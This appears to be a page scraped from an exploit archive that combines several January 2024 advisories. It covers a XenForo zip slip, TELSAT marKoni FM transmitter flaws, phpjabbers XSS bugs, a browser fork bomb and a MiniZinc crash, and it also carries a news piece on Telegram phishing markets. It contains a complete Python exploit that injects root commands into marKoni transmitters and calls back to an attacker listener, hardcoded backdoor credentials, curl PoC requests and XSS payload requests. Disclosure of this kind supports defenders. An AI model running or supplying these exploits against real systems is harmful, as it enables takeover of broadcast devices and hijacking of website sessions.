XenForo versions 2.2.13 and below suffer from a zip slip filename traversal vulnerability in ArchiveImport.php.

------------------------------------------------------------  
XenForo <= 2.2.13 (ArchiveImport.php) Zip Slip Vulnerability  
------------------------------------------------------------

[-] Software Link:

https://xenforo.com

[-] Affected Versions:

Version 2.2.13 and prior versions.

[-] Vulnerability Description:

The vulnerability is located in the  
/src/XF/Service/Style/ArchiveImport.php script. Specifically, into the  
"ArchiveImport::extractFilesToTempDir()" method:

198. public function extractFilesToTempDir()  
199. {  
200. $zip = $this->zip();  
201. $DS = \XF::$DS;  
202.  
203. if ($this->extracted)  
204. {  
205. return;  
206. }  
207.  
208. for ($i = 0; $i < $zip->numFiles; $i++)  
209. {  
210. $zipFileName = $zip->getNameIndex($i);  
211. $fsFileName = $this->getFsFileNameFromZipName($zipFileName);  
212. if ($fsFileName === null)  
213. {  
214. continue;  
215. }  
216.  
217. $finalFileName = $this->tempDir . $DS . $fsFileName;  
218.  
219. $dataStream = $zip->getStream($zipFileName);  
220. @File::writeFile($finalFileName, $dataStream, false);  
221. }

The vulnerability exists because the above code is using the filename  
provided within the Zip archive ($zipFileName variable created at line  
210) to write the extracted file by using "File::writeFile()" at line  
220, without properly verifying whether it contains Path Traversal  
sequences. This could be exploited to carry out Zip Slip (or Path  
Traversal) attacks and write/overwrite arbitrary files on the web  
server, resulting in execution of arbitrary PHP code or other security  
impacts. Successful exploitation of this vulnerability requires an  
account with permissions to administer styles.

[-] Solution:

Upgrade to version 2.2.14 or later.

[-] Disclosure Timeline:

[02-01-2024] - Vendor notified  
[17-01-2024] - CVE identifier requested  
[24-01-2024] - Vendor replied a fix will be available in the next release  
[30-01-2024] - Version 2.2.14 released  
[30-01-2024] - Publication of this advisory

[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org) has  
not assigned a CVE identifier for this vulnerability.

[-] Credits:

Vulnerability discovered by Egidio Romano.

[-] Other References:

https://xenforo.com/tickets/BC37EB98/?v=5da7bd5728

[-] Original Advisory:

http://karmainsecurity.com/KIS-2024-01

XenForo 2.2.13 ArchiveImport.php Zip Slip

TELSAT marKoni FM Transmitter version 1.9.5 allows an unauthorized user to change passwords.

TELSAT marKoni FM Transmitter 1.9.5 Insecure Access Control Change Password

Vendor: TELSAT Srl  
Product web page: https://www.markoni.it  
Affected version: Markoni-D (Compact) FM Transmitters  
                  Markoni-DH (Exciter+Amplifiers) FM Transmitters  
                  Markoni-A (Analogue Modulator) FM Transmitters  
                  Firmware: 1.9.5  
                            1.9.3  
                            1.5.9  
                            1.4.6  
                            1.3.9

Summary: Professional FM transmitters.

Desc: Unauthorized user could exploit this vulnerability to change  
his/her password, potentially gaining unauthorized access to sensitive  
information or performing actions beyond her/his designated permissions.

Tested on: GNU/Linux 3.10.53 (armv7l)  
           icorem6solox  
           lighttpd/1.4.33

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
Macedonian Information Security Research and Development Laboratory  
Zero Science Lab - https://www.zeroscience.mk - @zeroscience

Advisory ID: ZSL-2024-5811  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5811.php

10.11.2023

--

PoC request of a user changing his own password.  
Only admin can edit users. No permissions or Cookie check.

$ curl -s -H "Cookie: name=user-1702119917" \  
http://10.0.8.3:88/cgi-bin/ekafcgi.fcgi?OpCode=4&username=user&password=user&newpassword=t00tw00t

HTTP/1.1 200 OK  
Content-type: text/html  
Cache-control: no-cache  
Set-Cookie: name=user-1702119917; max-age=315360000  
Transfer-Encoding: chunked  
Date: Sat, 9 Dec 2023 11:05:17 GMT  
Server: lighttpd/1.4.33

oc=4&resp=0

TELSAT marKoni FM Transmitter 1.9.5 Insecure Access Control

TELSAT marKoni FM Transmitter version 1.9.5 implements client-side restrictions that can be bypassed by editing the HTML source page that enable administrative operations.

  
TELSAT marKoni FM Transmitter 1.9.5 Client-Side Access Control Bypass

Vendor: TELSAT Srl  
Product web page: https://www.markoni.it  
Affected version: Markoni-D (Compact) FM Transmitters  
                  Markoni-DH (Exciter+Amplifiers) FM Transmitters  
                  Markoni-A (Analogue Modulator) FM Transmitters  
                  Firmware: 1.9.5  
                            1.9.3  
                            1.5.9  
                            1.4.6  
                            1.3.9

Summary: Professional FM transmitters.

Desc: The application implements client-side restrictions that can  
be bypassed by editing the HTML source page that enable administrative  
operations.

Tested on: GNU/Linux 3.10.53 (armv7l)  
           icorem6solox  
           lighttpd/1.4.33

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
Macedonian Information Security Research and Development Laboratory  
Zero Science Lab - https://www.zeroscience.mk - @zeroscience

Advisory ID: ZSL-2024-5810  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5810.php

10.11.2023

--

These few JavaScript functions can be called directly in the browser's console  
and can enable a user to execute and apply modifications with admin rights.  
There are plenty more functions throughout the web application's interface.

set_wget()  
change_ip_settings()  
change_web_port()  
set_sendtime()  
add_mailaddress()  
set_mailinglist()  
...  
...

TELSAT marKoni FM Transmitter 1.9.5 Client-Side Access Control Bypass

TELSAT marKoni FM Transmitter version 1.9.5 has a hidden super administrative account factory that has the hardcoded password inokram25 that allows full access to the web management interface configuration.

    TELSAT marKoni FM Transmitter 1.9.5 Backdoor AccountVendor: TELSAT SrlProduct web page: https://www.markoni.itAffected version: Markoni-D (Compact) FM Transmitters                  Markoni-DH (Exciter+Amplifiers) FM Transmitters                  Markoni-A (Analogue Modulator) FM Transmitters                  Firmware: 1.9.5                            1.9.3                            1.5.9                            1.4.6                            1.3.9Summary: Professional FM transmitters.Desc: The transmitter has a hidden super administrative account 'factory'that has the hardcoded password 'inokram25' that allows full access tothe web management interface configuration. The factory account is notvisible in the users page of the application and the password cannot bechanged through any normal operation of the device. The backdoor lies inthe /js_files/LogIn_local.js script file. Attackers could exploit thisvulnerability by logging in using the backdoor credentials for the webpanel gaining also additional functionalities including: unit configuration,parameter modification, EEPROM overwrite, clearing DB, and factory logmodification.Tested on: GNU/Linux 3.10.53 (armv7l)           icorem6solox           lighttpd/1.4.33Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research and Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2024-5809Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5809.phpCWE ID: 912CWE URL: https://cwe.mitre.org/data/definitions/912.html10.11.2023--The credentials can be seen in the auto_login() JS function in theunprotected /js_files/LogIn_local.js file:$ curl -s http://10.0.8.3:88/js_files/LogIn_local.js |grep -A2 "auto_login()"function auto_login() {     // @mod1    var username = "factory";    var password = "inokram25";$

TELSAT marKoni FM Transmitter 1.9.5 Backdoor Account

TELSAT marKoni FM Transmitter version 1.9.5 is susceptible to unauthenticated remote code execution with root privileges. An attacker can exploit a command injection vulnerability by manipulating the Email settings' WAN IP info service, which utilizes the wget module. This allows the attacker to gain unauthorized access to the system with administrative privileges by exploiting the url parameter in the HTTP GET request to ekafcgi.fcgi.

    #!/usr/bin/env python### TELSAT marKoni FM Transmitter 1.9.5 Root Command Injection PoC Exploit### Vendor: TELSAT Srl# Product web page: https://www.markoni.it# Affected version: Markoni-D (Compact) FM Transmitters#                   Markoni-DH (Exciter+Amplifiers) FM Transmitters#                   Markoni-A (Analogue Modulator) FM Transmitters#                   Firmware: 1.9.5#                             1.9.3#                             1.5.9#                             1.4.6#                             1.3.9## Summary: Professional FM transmitters.## Desc: The marKoni FM transmitters are susceptible to unauthenticated# remote code execution with root privileges. An attacker can exploit# a command injection vulnerability by manipulating the Email settings'# WAN IP info service, which utilizes the 'wget' module. This allows# the attacker to gain unauthorized access to the system with administrative# privileges by exploiting the 'url' parameter in the HTTP GET request# to ekafcgi.fcgi.## -------------------------------------------------------------------------# [lqwrm@metalgear ~]# python yp.tiolpxe 10.0.8.3:88 backdoor 10.0.8.69 whoami# Authentication successful for backdoor# Injecting command: whoami# Listening on port 9999# ('10.0.8.3', 47302) called back# Received: root# Housekeeping...# Zya and thanks for stopping by!## [lqwrm@metalgear ~]# ## -------------------------------------------------------------------------## Tested on: GNU/Linux 3.10.53 (armv7l)#            icorem6solox#            lighttpd/1.4.33### Vulnerability discovered by Gjoko 'LiquidWorm' Krstic# Macedonian Information Security Research and Development Laboratory# Zero Science Lab - https://www.zeroscience.mk - @zeroscience### Advisory ID: ZSL-2024-5808# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5808.php### 10.11.2023#from colorama import init, Foreimport re,os,sys,requestsimport socket,threadingfrom time import sleepinit()def just_listen_to_me(lport, cstop):    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    s.bind(("0.0.0.0", lport))    s.listen(1)    print("Listening on port " + str(lport))    try:        conn, addr = s.accept()        print(addr, "called back")        cstop.set()    except socket.timeout:        print("Call return timeout\nCheck your ports")        conn.close()    while True:        try:            odg = conn.recv(1771).decode()            uam = re.search(r"User-Agent:\s*(.*)", odg)            if uam:                uav = uam.group(1)                print(f"Received: {uav}")                exit()            else:                print("No output for you")        except:            print("Housekeeping...")            exit()    s.close()def authenticate(ipaddr, option): #### Encrypted Shit ####_"    auth_url = f"http://{ipaddr}" # oOoOoOoOoOoOoOoOoOoOoOo"    ep = "/cgi-bin/ekafcgi.fcgi?OpCode=" ##################"    if option == "user": ##################################"        username = "\x75\x73\x65\x72" #####################"        password = "\x75\x73\x65\x72" #####################"    elif option == "admin": ###############################"        username = "\x61\x64\x6D\x69\x6E" #################"        password = "\x61\x64\x6D\x69\x6E" #################"    elif option == "backdoor": ############################"        username = "\x66\x61\x63\x74\x6F\x72\x79" #########"        password = "\x69\x6E\x6F\x6B\x72\x61\x6D\x32\x35"#_"    authp = {        'username': username,        'password': password    }    resp = requests.get(auth_url + ep + "1", params=authp)    if "Set-Cookie" in resp.headers:        print(f"Authentication successful for {option}")        auth_cookie = resp.headers["Set-Cookie"].split(";")[0]        return auth_cookie    else:        print(f"Authentication failed for {option}.")        print("Try a different option.")        return Nonedef execute(ipaddr, cookie, command, listen_ip):    print(f"Injecting command: {command}")    ep = "/cgi-bin/ekafcgi.fcgi?OpCode="    eden = f"http://{ipaddr}{ep}26&param=wget&ena=1&url=-U%20%60{command}%60%20{listen_ip}:9999"    dva = f"http://{ipaddr}{ep}27"    tri = f"http://{ipaddr}{ep}26&param=wget&ena=0&url="    clear = f"http://{ipaddr}{ep}3&com1=203C%20001001"    headers = {"Cookie": cookie}    requests.get(eden, headers=headers)    sleep(2)    requests.get(dva, headers=headers)    sleep(2)    requests.get(tri, headers=headers)    sleep(1)    requests.get(clear, headers=headers)    print("Zya and thanks for stopping by!")    exit(0)def njaaah(text):    columns = os.get_terminal_size().columns    print(text.center(columns))zsl = "\033[91mWaddup!\033[0m" #Win64mrjox = f"""     ________   /          \\  /    ____    \\ |   /    0 \\   | |   \\______/   |   \\____________/  {zsl}       | |      /   \\     /  O  \\    |    O  \\    |       \\    |        \\    |_________|        """if len(sys.argv) != 5:    print()    print("This is a PoC script for the marKoni transmitters 0day")    print("Usage: python yp.tiolpxe <target_ip:port> <option> <listen_ip> <command>")    print("Option: 'user', 'admin', 'backdoor'")    print("Default listening port: 9999")    njaaah(mrjox)    exit()ipaddr = sys.argv[1]opt = sys.argv[2]listen_ip = sys.argv[3]command = sys.argv[4]opt_map = {    "admin"    : "admin",    "user"     : "user",    "backdoor" : "backdoor"}if opt in opt_map:    auth_cookie = authenticate(ipaddr, opt_map[opt])    if auth_cookie:        cstop = threading.Event()        lt = threading.Thread(target=just_listen_to_me, args=(9999, cstop))        lt.start()        execute(ipaddr, auth_cookie, command, listen_ip)        cstop.set()        lt.join()else:    print("Invalid option.")

TELSAT marKoni FM Transmitter 1.9.5 Root Command Injection

Cybersecurity researchers are calling attention to the "democratization" of the phishing ecosystem owing to the emergence of Telegram as an epicenter for cybercrime, enabling threat actors to mount a mass attack for as little as $230.
"This messaging app has transformed into a bustling hub where seasoned cybercriminals and newcomers alike exchange illicit tools and insights creating a dark and

Cybersecurity researchers are calling attention to the "democratization" of the phishing ecosystem owing to the emergence of Telegram as an epicenter for cybercrime, enabling threat actors to mount a mass attack for as little as $230.

"This messaging app has transformed into a bustling hub where seasoned cybercriminals and newcomers alike exchange illicit tools and insights creating a dark and well-oiled supply chain of tools and victims' data," Guardio Labs researchers Oleg Zaytsev and Nati Tal said in a new report.

"Free samples, tutorials, kits, even hackers-for-hire -- everything needed to construct a complete end-to-end malicious campaign."

This is not the first time the popular messaging platform has come under the radar for facilitating malicious activities, which are in part driven by its lenient moderation efforts.

As a result, what used to be available only on invite-only forums in the dark web is now readily accessible via public channels and groups, thereby opening the doors of cybercrime to aspiring and inexperienced cyber criminals.

In April 2023, Kaspersky revealed how phishers create Telegram channels to educate newbies about phishing as well as advertise bots that can automate the process of creating phishing pages for harvesting sensitive information such as login credentials.

One such malicious Telegram bot is Telekopye (aka Classiscam), which can craft fraudulent web pages, emails, SMS messages to help threat actors pull off large-scale phishing scams.

Guardio said the building blocks to construct a phishing campaign can be readily purchased off Telegram – "some offered at very low prices, and some even for free" – thereby making it possible to set up scam pages via a phishing kit, host the page on a compromised WordPress website via a web shell, and leverage a backdoor mailer to send the email messages.

Backdoor mailers, marketed on various Telegram groups, are PHP scripts injected into already infected-but-legitimate websites to send convincing emails using the legitimate domain of the exploited website to bypass spam filters.

"This situation highlights a dual responsibility for site owners," the researchers said. "They must safeguard not only their business interests but also protect against their platforms being used by scammers for hosting phishing operations, sending deceptive emails, and conducting other illicit activities, all unbeknownst to them."

To further increase the likelihood of success of such campaigns, digital marketplaces on Telegram also provide what's known as "letters," which are "expertly designed, branded templates" that make the email messages appear as authentic as possible to trick the victims into clicking on the bogus link pointing to the scam page.

Telegram is also host to bulk datasets containing valid and relevant email addresses and phone numbers to target. Referred to as "leads," they are sometimes "enriched" with personal information such as names and physical addresses to maximize the impact.

"These leads can be incredibly specific, tailored for any region, niche, demographic, specific company customers, and more," the researchers said. "Every piece of personal information adds to the effectiveness and credibility of these attacks."

The way these lead lists are prepared can vary from seller to seller. They can be procured either from cybercrime forums that sell data stolen from breached companies or through sketchy websites that urge visitors to complete a fake survey in order to win prizes.

Another crucial component of these phishing campaigns is a means to monetize the collected stolen credentials by selling them to other criminal groups in the form of "logs," netting the threat actors a 10-fold return on their investment based on the number of victims who end up providing valid details on the scam page.

"Social media account credentials are sold for as little as a dollar, while banking accounts and credit cards could be sold for hundreds of dollars — depending on their validity and funds," the researchers said.

"Unfortunately, with just a small investment, anyone can start a significant phishing operation, regardless of prior knowledge or connections in the criminal underworld."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Telegram Marketplaces Fuel Phishing Attacks with Easy-to-Use Kits and Malware

Interactive Floor Plan version 1.0 suffers from a cross site scripting vulnerability.

    ## Title: Interactive-Floor-Plan-1.0-XSS-Reflected-SESSION-Hijacking## Author: nu11secur1ty## Date: 01/28/2024## Vendor: https://www.phpjabbers.com/## Software: https://www.phpjabbers.com/interactive-floor-plan-software/#sectionDemo## Reference: https://portswigger.net/web-security/cross-site-scripting/reflected## Description:The value of the action request parameter is copied into the HTMLdocument as plain text between tags. The payload epe7x<img src=aonerror=alert(1)>aagqb was submitted in the action parameter. Thisinput was echoed unmodified in the application's response. Theattacker can steal session cookies etc.STATUS: HIGH - Vulnerability[+]Exploit:```GETGET /1706426767_110/index.php?controller=pjFront&action=pjActionLoadCssepe7x%3cimg%20src%3da%20onerror%3dalert(1)%3eaagqbHTTP/1.1Host: demo.phpjabbers.comAccept-Encoding: gzip, deflate, brAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85Safari/537.36Connection: closeCache-Control: max-age=0Cookie: _ga=GA1.2.809339229.1706427310;_gid=GA1.2.1556395590.1706427310; _gat=1;_fbp=fb.1.1706427309936.1280956215;_ga_NME5VTTGTT=GS1.2.1706427311.1.0.1706427311.60.0.0Upgrade-Insecure-Requests: 1Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="121", "Chromium";v="121"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 0```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2024/Interactive-Floor-Plan-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/01/interactive-floor-plan-10-xss-reflected.html)## Time spent:00:35:00

Interactive Floor Plan 1.0 Cross Site Scripting

Chrome version 121 suffers from a javascript fork malloc vulnerability that indicates memory corruption upon crash.

    Searching the web for `javascript fork malloc bomb` returns results,e.g. [here][1]: and [here][2]:We got a javascript fork malloc bomb which crashed Chrome 121 on linuxwith SIGILL and about one in five runs the virtual machine freezes.SIGILL almost always is a sign of memory corruption :)On android it crashes the current tab without explanation.Firefox 121 on linux also crashes the current tab.In all cases except the sporadic freezes, the browser remains functioning,not counting the crashed tab.The javscript code is simply simple:`setInterval("document.body.innerHTML += document.body.innerHTML ",1);`[Online demo][3]: In case someone wants to test it on other browsersor debug.The GNU/linux tests took about 1.5 minutes in a virtual machine with4GB RAM and single core.[1]: http://wiki.glitchdata.com/index.php/Examples_of_fork_bombs#JavaScript[2]: https://gist.github.com/betandr/f0cbbb663accc3a76c11cc7661711566#javascript[3]: https://www.guninski.com/fork1.html

Chrome 121 Javascript Fork Malloc Bomb

PHPJ Callback Widget version 1.0 suffers from a persistent cross site scripting vulnerability.

    ## Title: PHPJ-Callback-Widget-1.0-XSS-Stored-admin-Hijacking## Author: nu11secur1ty## Date: 01/26/2024## Vendor: https://www.phpjabbers.com/## Software: https://www.phpjabbers.com/callback-widget/## Reference: https://portswigger.net/web-security/cross-site-scripting## Description:The Callback Requests function is vulnerable to javascript injection.The malicious user from everywhere can send an XSs-stored exploit codeto the admin panel, and then when the admin visits the API CallbackRequests function he will immediately activate the exploitation of themalicious actor. This is so fun, thanks for watching the PoC video. =)BRSTATUS: HIGH-Vulnerability[+]Exploit:```POSTPOST /1706261102_419/index.php?controller=pjFront&action=pjActionSave HTTP/1.1Host: demo.phpjabbers.comCookie: _ga=GA1.2.2069938240.1692907228;_fbp=fb.1.1705479327501.84379277;_ga_NME5VTTGTT=GS1.2.1705493664.10.1.1705493702.22.0.0;CallbackWidget=irnrkmih5bc4ehc7fcgbc8ql84Content-Length: 322Sec-Ch-Ua: "Not_A Brand";v="8", "Chromium";v="120"Accept: */*Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestSec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.216Safari/537.36Sec-Ch-Ua-Platform: "Windows"Origin: https://demo.phpjabbers.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://demo.phpjabbers.com/1706261102_419/preview.php?theme=theme1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Priority: u=1, iConnection: closereason_id=2&name=%3Ca+href%3D%22https%3A%2F%2Fwww.pornhub.com%22+target%3D%22_blank%22%3E+%09%3Cimg+src%3D%22https%3A%2F%2Fel.phncdn.com%2Fgif%2F45467111.gif%22+alt%3D%22STUPID%22width%3D%22900%22+height%3D%22450%22%3E+%3C%2Fa%3E&email=hack%40hack.com&phone=1234567890&besttime=30-01-2024+11%3A30&timezone=0&captcha=VIXFWL```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2024/Callback-Widget-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/01/phpj-callback-widget-10-xss-reflected.html)## Time spent:00:15:00

PHPJ Callback Widget 1.0 Cross Site Scripting

MiniZinc version 2.7.6 suffers from a null pointer vulnerability.

**MiniZinc 2.7.6 Null Pointer**

Posted Jan 29, 2024

Authored by Meng Ruijie

MiniZinc version 2.7.6 suffers from a null pointer vulnerability.

tags | advisory

advisories | CVE-2023-46050

SHA-256 | a80cb0270b834776631af2ca8f8daa61229fb0418cf1801a697093adfbf995c9

Download | Favorite | View

**MiniZinc 2.7.6 Null Pointer**

    [Vulnerability description]A null pointer deference existed in MiniZinc v.2.7.6 via a crafted Preferences.json file.[VulnerabilityType Other]null pointer deference[Vendor of Product]MiniZinc[Affected Product Code Base]MiniZinc - 2.7.6[Reference]https://github.com/MiniZinc/libminizinc/issues/729[CVE Reference]The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2023-46050 to this vulnerability.

**File Tags**

*   ActiveX (932)
*   Advisory (83,946)
*   Arbitrary (16,508)
*   BBS (2,859)
*   Bypass (1,810)
*   CGI (1,031)
*   Code Execution (7,521)
*   Conference (685)
*   Cracker (843)
*   CSRF (3,365)
*   DoS (24,223)
*   Encryption (2,377)
*   Exploit (52,460)
*   File Inclusion (4,241)
*   File Upload (982)
*   Firewall (822)
*   Info Disclosure (2,819)
*   Intrusion Detection (902)
*   Java (3,111)
*   JavaScript (884)
*   Kernel (6,899)
*   Local (14,626)
*   Magazine (586)
*   Overflow (12,942)
*   Perl (1,429)
*   PHP (5,167)
*   Proof of Concept (2,359)
*   Protocol (3,677)
*   Python (1,585)
*   Remote (31,191)
*   Root (3,610)
*   Rootkit (517)
*   Ruby (615)
*   Scanner (1,646)
*   Security Tool (7,948)
*   Shell (3,224)
*   Shellcode (1,216)
*   Sniffer (898)
*   Spoof (2,236)
*   SQL Injection (16,468)
*   TCP (2,420)
*   Trojan (687)
*   UDP (896)
*   Virus (667)
*   Vulnerability (32,325)
*   Web (9,813)
*   Whitepaper (3,763)
*   x86 (966)
*   XSS (18,088)
*   Other

**File Archives**

*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,058)
*   BSD (375)
*   CentOS (57)
*   Cisco (1,926)
*   Debian (6,953)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,425)
*   HPUX (880)
*   iOS (369)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (48,371)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (487)
*   RedHat (14,947)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,245)
*   UNIX (9,356)
*   UnixWare (187)
*   Windows (6,620)
*   Other

Tag

#php